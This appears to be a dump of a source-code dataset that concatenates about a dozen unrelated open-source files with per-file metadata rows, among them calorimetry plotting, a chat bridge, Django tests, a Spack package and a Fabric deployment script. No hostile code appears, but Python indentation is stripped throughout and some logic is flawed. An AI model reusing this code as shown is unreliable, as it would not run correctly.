func.mysql_exec('DELETE ds FROM db_status AS ds, (SELECT s.id,d.host FROM db_status AS s LEFT JOIN db_servers_oracle AS d ON d.is_delete=0 AND d.monitor=1 AND s.host=d.host AND s.port=d.port WHERE db_type="oracle" HAVING d.`host` IS NULL) AS t WHERE ds.id=t.id')
logger.info("check oracle controller finished.")
if __name__=='__main__':
igTsNames = ["SYSAUX", "SYSTEM"]
main()
| gpl-3.0 | -3,721,397,332,160,236,000 | 51.386598 | 790 | 0.662698 | false |
johnmgregoire/NanoCalorimetry | plot_pprvsTsubtract20110818.py | 1 | 3566 | import numpy, h5py, os
from PnSC_main import *
from PnSC_h5io import *
from PnSC_math import *
p='C:/Users/JohnnyG/Documents/PythonCode/Vlassak/NanoCalorimetry/20110816_Zr-Hf-B.h5'
h5f=h5py.File(p, mode='r')
ehl=[\
('quadlinheating2_0817', 'cell9_25mAlinquad2_first_1_of_1', 'Zr-B, 1st'),\
('quadlinheating2_0817', 'cell9_25mAlinquad2_second_1_of_1', 'Zr-B, 2nd'),\
('quadlinheating2_0817', 'cell9_25mAlinquad2_third_1_of_1', 'Zr-B, 3rd'), \
#('quadlinheating2', 'pre_25mApluslinquad2_cell16_1_of_1', 'Hf-B, nth'), \
#('quadlinheating2', 'cell11_25malinquad2_1_of_1', 'empty'), \
]
tarrs=[]
pprarrs=[]
for i, (e, h, l) in enumerate(ehl):
hpsdl=CreateHeatProgSegDictList(p, e, h)
T=hpsdl[2]['sampletemperature'][0, :]
ppr=hpsdl[2]['samplepowerperrate'][0, :]
if 0:
pylab.plot(T, ppr*1.e6, label=l)
pylab.xlabel('Temperature (C)')
pylab.ylabel('power per rate ($\mu$J/K)')
pylab.legend(loc=0)
tarrs+=[T]
pprarrs+=[ppr]
def extremesmooth(x, binn=70, SGpts=170, SGorder=3):
xb=numpy.array([x[i*binn:(i+1)*binn].mean() for i in range(len(x)//binn)])
xbf=savgolsmooth(xb, nptsoneside=SGpts, order =SGorder)
ia=numpy.arange(binn, dtype='float32')/binn
xr=numpy.concatenate([ia*(b-a)+b for a, b in zip(xbf[:-1], xbf[1:])])
xr=numpy.concatenate([(xbf[1]-xbf[0])*ia[:binn//2]+xbf[0], xr, (xbf[-1]-xbf[-2])*ia[:binn//2]+xbf[-1]])
xr=numpy.concatenate([xr, (xbf[-1]-xbf[-2])*ia[:len(x)-len(xr)]+xbf[-1]])
return xr
if 1:
x=extremesmooth(pprarrs[0])
y=extremesmooth(pprarrs[1])
z=extremesmooth(pprarrs[2])
xt=tarrs[0]
yt=tarrs[1]
zt=tarrs[2]
tmin=max([t.min() for t in [xt, yt, zt]])
tmax=min([t.max() for t in [xt, yt, zt]])
tinterp=numpy.linspace(tmin, tmax, 2000)
xinterp=numpy.interp(tinterp, xt, x)
yinterp=numpy.interp(tinterp, yt, y)
zinterp=numpy.interp(tinterp, zt, z)
pylab.figure()
for i, (t, a, ai) in enumerate([(xt, x, xinterp), (yt, y, yinterp), (zt, z, zinterp)]):
pylab.subplot(3, 1, i+1)
pylab.plot(tinterp, ai)
pylab.plot(t, a)
pylab.figure()
xsub=xinterp-(zinterp+yinterp)/2.
for i, (a, l) in enumerate([(xinterp, '1st'), ((zinterp+yinterp)/2., 'subsequent')]):
pylab.plot(tinterp, a*1.e6, label=l, lw=2)
#pylab.legend(loc=2)
pylab.xlabel('Temperature (C)', fontsize=14)
pylab.ylabel('Calorimetric Signal ($\mu$J/K)', fontsize=14)
# pylab.text(700, 14, '1st',color='b', ha='left', fontsize=14)
# pylab.text(450, 14, 'subsequent',color='g', ha='right', fontsize=14)
pylab.annotate('1st',(540, 14),xytext=(630, 14),fontsize=14,color='b',arrowprops={'arrowstyle':'->','color':'b'})
pylab.annotate('subsequent',(490, 14),xytext=(380, 14),fontsize=14,color='g',arrowprops={'arrowstyle':'->','color':'g'}, ha='right')
pylab.xlim(0, 1200)
pylab.figure()
pylab.plot([0, 1200], [0, 0], 'k', lw=1)
pylab.plot(tinterp, xsub*1.e6, 'r-', lw=2)
# pylab.annotate(' ',(510, -2),xytext=(510, 0),color='k',arrowprops={'arrowstyle':'simple','color':'k'})
# pylab.annotate(' ',(1010, -14),xytext=(1010, 0),color='k',arrowprops={'arrowstyle':'simple','color':'k'})
#pylab.legend()
pylab.xlabel('Temperature (C)', fontsize=14)
pylab.ylabel('Differential signal ($\mu$J/K)', fontsize=14)
pylab.xlim(0, 1200)
pylab.subplots_adjust(right=.55, top=.5)
print xsub[(tinterp>260)*(tinterp<670)].sum()*(tinterp[1]-tinterp[0])*1.e6
print xsub[tinterp>670].sum()*(tinterp[1]-tinterp[0])*1.e6
pylab.show()
| bsd-3-clause | 3,636,669,032,018,904,600 | 39.988506 | 136 | 0.616938 | false |
felipemontefuscolo/bitme | tactic/bitmex_dummy_tactic.py | 1 | 1028 | from common.quote import Quote
from tactic import TacticInterface, ExchangeInterface, Symbol, OrderCommon, Fill
import pandas as pd
class BitmexDummyTactic(TacticInterface):
"""
This class is associated to orders issued by Bitmex
"""
def finalize(self) -> None:
pass
def handle_quote(self, quote: Quote) -> None:
pass
def handle_order_completed(self, order: OrderCommon) -> None:
pass
def handle_liquidation(self, pnl: float):
pass
def id(self):
return 'DUMMY'
def initialize(self, exchange: ExchangeInterface, preferences: dict) -> None:
pass
def get_symbol(self) -> Symbol:
pass
def handle_1m_candles(self, candles1m: pd.DataFrame) -> None:
pass
def handle_submission_error(self, failed_order: OrderCommon) -> None:
pass
def handle_fill(self, fill: Fill) -> None:
pass
def handle_cancel(self, order: OrderCommon) -> None:
pass
def handle_trade(self):
pass
| mpl-2.0 | 6,919,429,432,571,960,000 | 21.844444 | 81 | 0.636187 | false |
rmed/wat-bridge | wat_bridge/signals.py | 1 | 3542 | # -*- coding: utf-8 -*-
#
# wat-bridge
# https://github.com/rmed/wat-bridge
#
# The MIT License (MIT)
#
# Copyright (c) 2016 Rafael Medina García <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""Signal handlers."""
import sys
from wat_bridge.static import SETTINGS, get_logger
from wat_bridge.helper import get_contact, get_phone, db_get_group
from wat_bridge.tg import tgbot
from wat_bridge.wa import wabot
from telebot import util as tgutil
logger = get_logger('signals')
def sigint_handler(signal, frame):
"""Function used as handler for SIGINT to terminate program."""
sys.exit(0)
def to_tg_handler(sender, **kwargs):
"""Handle signals sent to Telegram.
This will involve sending messages through the Telegram bot.
Args:
phone (str): Phone number that sent the message.
message (str): The message received
"""
phone = kwargs.get('phone')
message = kwargs.get('message', '')
# Check if known contact
contact = get_contact(phone)
chat_id = SETTINGS['owner']
if not contact:
# Unknown sender
output = 'Message from #unknown\n'
output += 'Phone number: %s\n' % phone
output += '---------\n'
output += message
logger.info('received message from unknown number: %s' % phone)
else:
group = db_get_group(contact)
if not group:
# Known sender
output = 'Message from #%s\n' % contact
output += '---------\n'
output += message
else:
# Contact is bound to group
chat_id = group
output = message
logger.info('received message from %s' % contact)
# Deliver message through Telegram
for chunk in tgutil.split_string(output, 3000):
tgbot.send_message(chat_id, chunk)
def to_wa_handler(sender, **kwargs):
"""Handle signals sent to Whatsapp.
This will involve sending messages through the Whatsapp bot.
Args:
contact (str): Name of the contact to send the message to.
message (str): The message to send
"""
contact = kwargs.get('contact')
message = kwargs.get('message')
# Check if known contact
phone = get_phone(contact)
if not phone:
# Abort
tgbot.send_message(
SETTINGS['owner'],
'Unknown contact: "%s"' % contact
)
return
logger.info('sending message to %s (%s)' % (contact, phone))
wabot.send_msg(phone=phone, message=message)
| mit | -2,279,454,052,211,999,200 | 29.791304 | 80 | 0.661395 | false |
gladgod/zhiliao | zhiliao/galleries/tests.py | 1 | 2128 | from __future__ import unicode_literals
from future.builtins import str
from future.utils import native
import os
from shutil import rmtree
from uuid import uuid4
from zhiliao.conf import settings
from zhiliao.core.templatetags.mezzanine_tags import thumbnail
from zhiliao.galleries.models import Gallery, GALLERIES_UPLOAD_DIR
from zhiliao.utils.tests import TestCase, copy_test_to_media
class GalleriesTests(TestCase):
def test_gallery_import(self):
"""
Test that a gallery creates images when given a zip file to
import, and that descriptions are created.
"""
zip_name = "gallery.zip"
copy_test_to_media("zhiliao.core", zip_name)
title = native(str(uuid4())) # i.e. Py3 str / Py2 unicode
gallery = Gallery.objects.create(title=title, zip_import=zip_name)
images = list(gallery.images.all())
self.assertTrue(images)
self.assertTrue(all([image.description for image in images]))
# Clean up.
rmtree(os.path.join(settings.MEDIA_ROOT,
GALLERIES_UPLOAD_DIR, title))
def test_thumbnail_generation(self):
"""
Test that a thumbnail is created and resized.
"""
try:
from PIL import Image
except ImportError:
return
image_name = "image.jpg"
size = (24, 24)
copy_test_to_media("zhiliao.core", image_name)
thumb_name = os.path.join(settings.THUMBNAILS_DIR_NAME, image_name,
image_name.replace(".", "-%sx%s." % size))
thumb_path = os.path.join(settings.MEDIA_ROOT, thumb_name)
thumb_image = thumbnail(image_name, *size)
self.assertEqual(os.path.normpath(thumb_image.lstrip("/")), thumb_name)
self.assertNotEqual(os.path.getsize(thumb_path), 0)
thumb = Image.open(thumb_path)
self.assertEqual(thumb.size, size)
# Clean up.
del thumb
os.remove(os.path.join(settings.MEDIA_ROOT, image_name))
os.remove(os.path.join(thumb_path))
rmtree(os.path.join(os.path.dirname(thumb_path)))
| bsd-3-clause | 8,303,072,543,092,241,000 | 37 | 79 | 0.634868 | false |
Caylo/easybuild-framework | easybuild/toolchains/linalg/libsci.py | 1 | 3408 | ##
# Copyright 2014-2016 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
Support for Cray's LibSci library, which provides BLAS/LAPACK support.
cfr. https://www.nersc.gov/users/software/programming-libraries/math-libraries/libsci/
:author: Petar Forai (IMP/IMBA, Austria)
:author: Kenneth Hoste (Ghent University)
"""
import os
from easybuild.tools.build_log import EasyBuildError
from easybuild.tools.toolchain.linalg import LinAlg
CRAY_LIBSCI_MODULE_NAME = 'cray-libsci'
class LibSci(LinAlg):
"""Support for Cray's LibSci library, which provides BLAS/LAPACK support."""
# BLAS/LAPACK support
# via cray-libsci module, which gets loaded via the PrgEnv module
# see https://www.nersc.gov/users/software/programming-libraries/math-libraries/libsci/
BLAS_MODULE_NAME = [CRAY_LIBSCI_MODULE_NAME]
# no need to specify libraries, compiler driver takes care of linking the right libraries
# FIXME: need to revisit this, on numpy we ended up with a serial BLAS through the wrapper.
BLAS_LIB = []
BLAS_LIB_MT = []
LAPACK_MODULE_NAME = [CRAY_LIBSCI_MODULE_NAME]
LAPACK_IS_BLAS = True
BLACS_MODULE_NAME = []
SCALAPACK_MODULE_NAME = []
def _get_software_root(self, name):
"""Get install prefix for specified software name; special treatment for Cray modules."""
if name == 'cray-libsci':
# Cray-provided LibSci module
env_var = 'CRAY_LIBSCI_PREFIX_DIR'
root = os.getenv(env_var, None)
if root is None:
raise EasyBuildError("Failed to determine install prefix for %s via $%s", name, env_var)
else:
self.log.debug("Obtained install prefix for %s via $%s: %s", name, env_var, root)
else:
root = super(LibSci, self)._get_software_root(name)
return root
def _set_blacs_variables(self):
"""Skip setting BLACS related variables"""
pass
def _set_scalapack_variables(self):
"""Skip setting ScaLAPACK related variables"""
pass
def definition(self):
"""
Filter BLAS module from toolchain definition.
The cray-libsci module is loaded indirectly (and versionless) via the PrgEnv module,
and thus is not a direct toolchain component.
"""
tc_def = super(LibSci, self).definition()
tc_def['BLAS'] = []
tc_def['LAPACK'] = []
return tc_def
| gpl-2.0 | 3,152,435,905,276,720,000 | 36.450549 | 104 | 0.681631 | false |
dsparrow27/vortex | src/ds/vortex/nodes/comparison/equalTo.py | 1 | 1290 | from ds.vortex.core import baseNode
from ds.vortex.core import plug as plugs
class EqualToNode(baseNode.BaseNode):
def __init__(self, name):
"""
:param name: str, the name of the node
"""
baseNode.BaseNode.__init__(self, name)
def initialize(self):
baseNode.BaseNode.initialize(self)
self.outputPlug_ = plugs.OutputPlug("output", self)
self.addPlug(self.outputPlug_, clean=True)
self.value1Plug_ = plugs.InputPlug("value1", self, value=0)
self.value2Plug_ = plugs.InputPlug("value2", self, value=0)
self.addPlug(self.value1Plug_, clean=True)
self.addPlug(self.value2Plug_, clean=True)
self.plugAffects(self.value1Plug_, self.outputPlug_)
self.plugAffects(self.value2Plug_, self.outputPlug_)
def compute(self, requestPlug):
baseNode.BaseNode.compute(self, requestPlug=requestPlug)
if requestPlug != self.outputPlug_:
return None
result = self.value1Plug_ == self.value2Plug_.value
requestPlug.value = result
requestPlug.dirty = False
return result
def getNode():
"""General function that returns our node, used to get create our node via Ui etc
:return: Node instance
"""
return EqualToNode
| mit | -2,959,725,175,633,095,000 | 32.076923 | 85 | 0.651938 | false |
dkulikovsky/graphite-ch-web | webapp/graphite/events/views.py | 1 | 2767 | import datetime
import time
from django.http import HttpResponse
from django.shortcuts import render_to_response, get_object_or_404
from django.utils.timezone import localtime, now
from graphite.util import json
from graphite.events import models
from graphite.render.attime import parseATTime
from django.core.urlresolvers import get_script_prefix
def to_timestamp(dt):
return time.mktime(dt.timetuple())
class EventEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime.datetime):
return to_timestamp(obj)
return json.JSONEncoder.default(self, obj)
def view_events(request):
if request.method == "GET":
context = { 'events' : fetch(request),
'slash' : get_script_prefix()
}
return render_to_response("events.html", context)
else:
return post_event(request)
def detail(request, event_id):
e = get_object_or_404(models.Event, pk=event_id)
context = { 'event' : e,
'slash' : get_script_prefix()
}
return render_to_response("event.html", context)
def post_event(request):
if request.method == 'POST':
event = json.loads(request.body)
assert isinstance(event, dict)
values = {}
values["what"] = event["what"]
values["tags"] = event.get("tags", None)
values["when"] = datetime.datetime.fromtimestamp(
event.get("when", time.time()))
if "data" in event:
values["data"] = event["data"]
e = models.Event(**values)
e.save()
return HttpResponse(status=200)
else:
return HttpResponse(status=405)
def get_data(request):
if 'jsonp' in request.REQUEST:
response = HttpResponse(
"%s(%s)" % (request.REQUEST.get('jsonp'),
json.dumps(fetch(request), cls=EventEncoder)),
content_type='text/javascript')
else:
response = HttpResponse(
json.dumps(fetch(request), cls=EventEncoder),
content_type="application/json")
return response
def fetch(request):
#XXX we need to move to USE_TZ=True to get rid of localtime() conversions
if request.GET.get("from", None) is not None:
time_from = localtime(parseATTime(request.GET["from"])).replace(tzinfo=None)
else:
time_from = datetime.datetime.fromtimestamp(0)
if request.GET.get("until", None) is not None:
time_until = localtime(parseATTime(request.GET["until"])).replace(tzinfo=None)
else:
time_until = now()
tags = request.GET.get("tags", None)
if tags is not None:
tags = request.GET.get("tags").split(" ")
return [x.as_dict() for x in
models.Event.find_events(time_from, time_until, tags=tags)]
| apache-2.0 | 3,258,372,787,531,299,000 | 29.406593 | 86 | 0.633177 | false |
jat255/hyperspy | hyperspy/tests/misc/test_utils.py | 1 | 2016 | # -*- coding: utf-8 -*-
# Copyright 2007-2020 The HyperSpy developers
#
# This file is part of HyperSpy.
#
# HyperSpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# HyperSpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with HyperSpy. If not, see <http://www.gnu.org/licenses/>.
from hyperspy.misc.utils import slugify, parse_quantity, is_hyperspy_signal
from hyperspy import signals
import numpy as np
def test_slugify():
assert slugify('a') == 'a'
assert slugify('1a') == '1a'
assert slugify('1') == '1'
assert slugify('a a') == 'a_a'
assert slugify('a', valid_variable_name=True) == 'a'
assert slugify('1a', valid_variable_name=True) == 'Number_1a'
assert slugify('1', valid_variable_name=True) == 'Number_1'
assert slugify('a', valid_variable_name=False) == 'a'
assert slugify('1a', valid_variable_name=False) == '1a'
assert slugify('1', valid_variable_name=False) == '1'
def test_parse_quantity():
# From the metadata specification, the quantity is defined as
# "name (units)" without backets in the name of the quantity
assert parse_quantity('a (b)') == ('a', 'b')
assert parse_quantity('a (b/(c))') == ('a', 'b/(c)')
assert parse_quantity('a (c) (b/(c))') == ('a (c)', 'b/(c)')
assert parse_quantity('a [b]') == ('a [b]', '')
assert parse_quantity('a [b]', opening = '[', closing = ']') == ('a', 'b')
def test_is_hyperspy_signal():
s = signals.Signal1D(np.zeros((5, 5, 5)))
p = object()
assert is_hyperspy_signal(s) is True
assert is_hyperspy_signal(p) is False
| gpl-3.0 | 5,785,363,726,843,865,000 | 37.037736 | 78 | 0.659722 | false |
blowmage/gcloud-python | gcloud/storage/demo/__init__.py | 1 | 1054 | # Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from gcloud import storage
__all__ = ['create_bucket', 'list_buckets', 'PROJECT_ID']
PROJECT_ID = os.getenv('GCLOUD_TESTS_PROJECT_ID')
def list_buckets(connection):
return list(storage.list_buckets(project=PROJECT_ID,
connection=connection))
def create_bucket(bucket_name, connection):
return storage.create_bucket(bucket_name, PROJECT_ID,
connection=connection)
| apache-2.0 | 5,348,173,973,588,529,000 | 34.133333 | 74 | 0.706831 | false |
vaiski/checksum | src/checksum/checksum.py | 1 | 4815 | # -*- coding: utf-8 -*-
'''
Checksum
========
Provides an extendable checksum calculation and validation library for
different checksum algorithms.
'''
class ChecksumStrategy(object):
'''
An interface class for checksum algorithm classes.
'''
def checksum(self, body):
''' Calculates a checksum for the body string provided. '''
raise NotImplementedError('Checksum calculation is not implemented for'
'this checksum strategy.')
def is_valid(self, value, checksum=None):
'''
Validates a string against the checksum.
This abstract base class provides an elementary checksum validation
method. Advanced validation methods should be implemented in
subclasses when possible.
'''
body = value
if checksum is None:
(body, checksum) = self.split(value)
return self.checksum(body) == checksum
def split(self, value):
'''
Splits the string including a checksum according to the checksum
algorithm used.
'''
raise NotImplementedError('Splitting is not implemented for this '
'checksum strategy.')
def _prepare(self, body):
''' Method to prepare the body string for checksum calculation. '''
return [int(d) for d in str(body)]
class Checksum(object):
'''
Checksum context class. Provides different checksum calculation and
verification algorithms by acting as a factory class.
'''
_strategies = {}
def __init__(self, strategy=None, body=None):
'''
Checksum context class constructor.
:param strategy : name of the used checksum algorithm
:param body : string that the checksum is calculated for
'''
self._strategy = None
self._body = None
self.strategy = strategy
self.body = body
# Setters and getters
# -------------------
@property
def body(self):
''' Getter for the body property. '''
return self._body
@body.setter
def body(self, value):
''' Setter for the body property. '''
if value is not None:
self._body = value
else:
self._body = ''
@property
def strategy(self):
''' Getter for the strategy property. '''
return self._strategy
@strategy.setter
def strategy(self, value):
''' Setter for the strategy property. '''
if value is None:
return
if value in self._strategies:
strategy = self._strategies[value]()
else:
raise NotImplementedError('Checksum strategy %s is not '
'implemented.' % value)
if (isinstance(strategy, ChecksumStrategy) and
type(strategy) != ChecksumStrategy):
self._strategy = strategy
else:
raise TypeError(
'Strategy requires a subclass of ChecksumStrategy.'
' Got instead %s.' % type(strategy))
def checksum(self):
'''
Calculates the checksum using selected algorithm for the body string.
'''
if self.strategy is not None:
return self.strategy.checksum(self._body)
def is_valid(self, value, checksum=None):
'''
Validates either a string containing a checksum or a body string and
a against separately provided checksum.
'''
if self.strategy is not None:
return self.strategy.is_valid(value, checksum)
def split(self, value):
'''
Splits a string containing a body and a checksum according to the
conventions of selected checksum algorithm.
'''
if self.strategy is not None:
return self.strategy.split(value)
def type(self):
'''
Returns the name of used checksum algorithm.
'''
if self.strategy is not None:
return self.strategy.name
else:
return None
@classmethod
def register_strategy(cls, strategy_cls):
'''
Registers a checksum strategy class in the available checksum
strategies.
'''
strategy = strategy_cls()
if (isinstance(strategy, ChecksumStrategy) and
type(strategy) != ChecksumStrategy):
cls._strategies[strategy_cls.name] = strategy_cls
else:
raise TypeError(
'Strategy requires a subclass of ChecksumStrategy.'
' Got instead %s.' % type(strategy))
@classmethod
def list_strategies(cls):
'''
Lists all the available strategies for checksum calculation.
'''
return cls._strategies.keys()
| mit | -6,618,260,355,587,514,000 | 27.660714 | 79 | 0.580685 | false |
jovencoda/evoca-v2 | evoca_v2/core/migrations/0022_auto_20170820_0036.py | 1 | 1202 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-08-20 00:36
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
dependencies = [
('core', '0021_channel_image'),
]
operations = [
migrations.CreateModel(
name='ChannelTag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uniqueID', models.UUIDField(default=uuid.uuid4, editable=False)),
('name', models.CharField(max_length=255)),
('slug', models.SlugField(blank=True, null=True)),
],
),
migrations.AlterField(
model_name='channel',
name='image',
field=models.ImageField(blank=True, null=True, upload_to='static/img/'),
),
migrations.AddField(
model_name='channeltag',
name='related_channel',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_channel', to='core.Channel'),
),
]
| gpl-3.0 | 819,544,230,349,932,200 | 32.388889 | 132 | 0.587354 | false |
skosukhin/spack | var/spack/repos/builtin/packages/r-alsace/package.py | 1 | 2082 | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RAlsace(RPackage):
"""Alternating Least Squares (or Multivariate Curve Resolution)
for analytical chemical data, in particular hyphenated data where
the first direction is a retention time axis, and the second a
spectral axis. Package builds on the basic als function from the
ALS package and adds functionality for high-throughput analysis,
including definition of time windows, clustering of profiles,
retention time correction, etcetera."""
homepage = "https://www.bioconductor.org/packages/alsace/"
url = "https://git.bioconductor.org/packages/alsace"
version('1.12.0', git='https://git.bioconductor.org/packages/alsace', commit='1364c65bbff05786d05c02799fd44fd57748fae3')
depends_on('r-als', type=('build', 'run'))
depends_on('r-ptw', type=('build', 'run'))
| lgpl-2.1 | -4,289,728,429,612,582,000 | 47.418605 | 124 | 0.694524 | false |
lancms/lancms2 | fabfile.py | 1 | 5721 | from fabric.api import *
from fabric.colors import green, red
from fabric.contrib import files
import datetime
import os
def _environment ():
env.release = datetime.datetime.now().strftime ("%Y-%m-%d-%H%M%S")
env.project_name = 'lancms2'
# FIXME: hardcoded path:
env.path_home = '/opt/lancms2/'
env.path_root = os.path.join (env.path_home, 'deployment/')
env.path_current = os.path.join (env.path_root, 'current')
env.path_releases = os.path.join (env.path_root, 'releases/')
env.path_full_release = os.path.join (env.path_releases, env.release)
env.path_full_release_local_settings = os.path.join (env.path_full_release, 'lancms2/local_settings.py')
env.path_full_release_local_sqlite = os.path.join (env.path_full_release, 'lancms2.sql')
env.path_apache2_sites_available = '/etc/apache2/sites-available/'
env.filename_apacheconf = 'apache2-wsgi-virtualhost.conf'
env.virenv = 'source %s/virtualenv/bin/activate' % env.path_root
# FIXME: hardcoded user and group:
env.owner_user = 'www-data'
env.owner_group = 'lancms2'
def _upload_and_unpack ():
# local is on local host
local ('bzr export --format=tgz %s.tar.gz' % env.release);
# run is on remote host!
run ('mkdir -p %s' % env.path_full_release)
# put places local file on remote server
put ('%s.tar.gz' % env.release, env.path_releases, mode=0750)
local ('rm -f %s.tar.gz' % env.release)
with cd ('%s' % env.path_releases):
run ('tar -xzf %s.tar.gz' % env.release)
run ('rm %s.tar.gz' % env.release)
print (green ('Uploaded and unpacked'))
def _create_virtualenv ():
with cd ('%s' % env.path_root):
run ('virtualenv virtualenv -p python3')
run ('source %svirtualenv/bin/activate' % env.path_root)
print (green ('Created (or recreated) virtual environment'))
def _set_release_permissions ():
sudo ('chown %s:%s -R %s' % (env.owner_user, env.owner_group, env.path_full_release), shell=False)
sudo ('chmod g+w -R %s' % (env.path_full_release), shell=False)
print (green ('Set permissions for www-data on %s' % env.path_full_release))
def _install_requirements ():
with cd ('%s' % env.path_full_release):
run ('source %svirtualenv/bin/activate; pip install -r requirements.txt' % env.path_root)
print (green ('Installed requirements in virtual environment'))
def _symlink_local_settings ():
path_file = os.path.join (env.path_home, 'LOCAL_SETTINGS.py')
if files.exists (path_file):
run ('ln -s %s %s' % (path_file, env.path_full_release_local_settings))
print (green ('Symlinked local_settings'))
def _symlink_local_sqlite ():
path_file = os.path.join (env.path_home, 'LANCMS2.sql')
if files.exists (path_file):
run ('ln -s %s %s' % (path_file, env.path_full_release_local_sqlite))
print (green ('Symlinked local sqlite'))
def _symlink_current_release ():
if files.exists (env.path_current):
run ('rm -f %s' % env.path_current)
print (red ('Removed symlink for previous release'))
run ('ln -s %s %s' % (env.path_full_release, env.path_current))
print (green ('Symlinked current release %s to %s' % (env.release, env.path_current)))
def _check_hosts ():
if not env.hosts or env.hosts == "":
import sys
print ""
print red("Missing hosts. Printing helptext.")
help ()
sys.exit ()
def _install_local_requirements ():
path_file = os.path.join (env.path_home, 'REQUIREMENTS.txt')
if files.exists (path_file):
with cd ('%s' % env.path_full_release):
run ('source %svirtualenv/bin/activate; pip install -r %s' % (env.path_root, path_file))
print (green ('Installed local requirements (%s) in virtual environment' % path_file))
else:
print (red ('No local requirements (%s)' % path_file))
def _syncdb ():
with cd (env.path_current):
run ('source %svirtualenv/bin/activate; ./manage.py syncdb --noinput' % env.path_root)
print (green ('Ran syncdb'))
def _migrate ():
with cd (env.path_current):
run ('source %svirtualenv/bin/activate; ./manage.py migrate' % env.path_root)
print (green ('Ran migrate'))
def _restart_webserver ():
# FIXME: this could be too Debian specific for real reuse. I don't know, haven't used anything but Debian in a long while. :-)
sudo ('/usr/sbin/service apache2 restart', shell=False)
print (green ('Restarted apache2'))
def _configure_webserver ():
path_sfile = os.path.join (env.path_current, env.filename_apacheconf)
if files.exists (path_sfile):
path_dfile = os.path.join (env.path_apache2_sites_available, env.project_name)
sudo ('/bin/cp -f %s %s' % (path_sfile, path_dfile), shell=False)
sudo ('/usr/sbin/a2ensite %s' % env.project_name, shell=False)
print (green ('Configured apache2 and activated site'))
else:
print (red ("Didn't configure apache2, no config file found."))
def _collectstatic ():
with cd (env.path_current):
run ('source %svirtualenv/bin/activate; ./manage.py collectstatic --noinput' % env.path_root)
print (green ('Ran collectstatic'))
def _put_revision_number ():
local ('bzr revno > /tmp/%s' % env.release)
put ('/tmp/%s' % env.release, '%s/.bzr_rev' % env.path_full_release, mode=0750)
local ('rm /tmp/%s' % env.release)
def deploy ():
_check_hosts ()
_environment ()
_upload_and_unpack ()
_create_virtualenv ()
_install_requirements ()
_install_local_requirements ()
_symlink_local_settings ()
_symlink_local_sqlite ()
_symlink_current_release ()
_syncdb ()
_migrate ()
_collectstatic ()
_configure_webserver ()
_restart_webserver ()
_put_revision_number ()
_set_release_permissions ()
def help ():
print ""
print "deployment script for lancms2"
print ""
print "Only available command is 'deploy'."
print "Remember to define host (-H [email protected])"
print "Please don't use this if you don't know what it does! No warranties!"
| gpl-2.0 | -6,103,830,826,268,953,000 | 31.87931 | 127 | 0.68502 | false |
